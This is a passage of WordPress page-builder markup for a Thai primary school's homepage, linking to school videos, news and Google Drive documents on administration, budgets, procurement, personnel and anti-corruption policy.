{\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"9a3f4403\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"c36e8900\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 